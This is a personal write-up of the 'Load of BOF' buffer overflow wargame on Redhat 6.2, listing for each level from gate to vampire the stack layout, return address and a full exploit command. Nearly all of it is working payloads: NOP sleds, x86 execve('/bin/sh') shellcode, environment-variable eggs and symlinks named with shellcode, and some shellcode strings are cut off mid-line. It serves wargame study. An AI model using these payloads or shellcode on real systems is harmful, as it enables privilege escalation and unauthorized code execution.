Wargames/Load Of BOF

LOB Redhat 6.2 - vampire
vampire - argv hunter
Stack : saved_argc[4] + i[4] + buffer[40] + sfp[4] + ret[4] + Program name
Symbolic Link : ln -s skeleton `python -c 'print "\x90"*100 + "\xd9\xc5\xd9\x74\x24\xf4\xb8\x15\xc3\x69\xd7\x5d\x29\xc9\xb1\x0b\x31\x45\x1a\x03\x45\x1a\x83\xc5\x04\xe2\xe0\xa9\x62\x8f\x93\x7c\x13\x47\x8e\xe3\x52\x70\xb8\xcc\x17\x17\x38\x7b\xf7\x85\x51\x15\x8e\xa9\xf3\x01\x98\x2d\xf3\xd1\xb6\x4f\x9a\xb..
LOB Redhat 6.2 - troll
troll - check 0xbfff
Stack : buffer[40] + sfp[4] + ret[4] + Environment Variable
Dummy : export dummy=`python -c 'print "A"*80000'`
return address : 0xbffec3b9
Payload : ./vampire `python -c 'print "\x90"*21 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" + "\xb9\xc3\xfe\xbf"'`
Using argv[1] address + Environment Variable Dummy
LOB Redhat 6.2 - orge
orge - check argc + argv hunter
Stack : i[4] + buffer[40] + sfp[4] + ret[4]
Symbolic Link : ln -s troll `python -c 'print "\x90"*100 + "\xd9\xc5\xd9\x74\x24\xf4\xb8\x15\xc3\x69\xd7\x5d\x29\xc9\xb1\x0b\x31\x45\x1a\x03\x45\x1a\x83\xc5\x04\xe2\xe0\xa9\x62\x8f\x93\x7c\x13\x47\x8e\xe3\x52\x70\xb8\xcc\x17\x17\x38\x7b\xf7\x85\x51\x15\x8e\xa9\xf3\x01\x98\x2d\xf3\xd1\xb6\x4f\x9a\xbf\xe7\xfc\x34\x40\xaf\x51..
LOB Redhat 6.2 - darkelf
darkelf - check argv[0]
Stack : i[4] + buffer[40] + sfp[4] + ret[4]
./orge == ./////////////orge
return address : 0xbffffc33 - 71 = 0xbffffbac
Payload : .`python -c 'print "/"*72 + "orge"'` `python -c 'print "A"*44 + "\xac\xfb\xff\xbf"'` `python -c 'print "\x90"*100 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`
Using argv[2] address
LOB Redhat 6.2 - wolfman
wolfman - egghunter + buffer hunter + check length of argv[1]
Stack : i[4] + buffer[40] + sfp[4] + ret[4]
return address : 0xbffffbfc
Payload : ./darkelf `python -c 'print "A"*44 + "\xfc\xfb\xff\xbf"'` `python -c 'print "\x90"*100 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`
Using argv[2] address
LOB Redhat 6.2 - orc
orc - egghunter + buffer hunter
Stack : i[4] + buffer[40] + sfp[4] + ret[4]
return address : 0xbffffc44
Payload : ./wolfman `python -c 'print "\x90"*21 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" + "\x44\xfc\xff\xbf"'`
Using argv[1] address
LOB Redhat 6.2 - goblin
goblin - egghunter
Stack : i[4] + buffer[40] + sfp[4] + ret[4]
return address : 0xbffffc01
Payload : ./orc `python -c 'print "A"*44 + "\x01\xfc\xff\xbf"'` `python -c 'print "\x90"*100 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`
Using buffer address
LOB Redhat 6.2 - cobolt
cobolt - small buffer + stdin
Stack : buffer[16] + sfp[4] + ret[4]
return address : 0xbffffeb9
Payload : (python -c 'print "A"*20 + "\xb9\xfe\xff\xbf"';cat) | ./goblin
Environment Variable : export shell=`python -c 'print "\x90"*100 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`
getenv.c : Using Environment Variable
LOB Redhat 6.2 - gremlin
*Note: this post is by no means a tutorial; it is a write-up of what I studied, recorded for my own reference.
gremlin - small buffer
Stack : buffer[16] + sfp[4] + ret[4]
return address : 0xbffffbee
Payload : ./cobolt `python -c 'print "A"*20 + "\xee\xfb\xff\xbf" + "\x90"*100 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`
Using argv[1] address
LOB Redhat 6.2 - gate
gate - simple BOF
Stack : buffer[256] + sfp[4] + ret[4]
return address : 0xbffff928
Payload : ./gremlin `python -c 'print "\x90"*137 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" + "\x90"*100 + "\x28\xf9\xff\xbf"'`
Using buffer address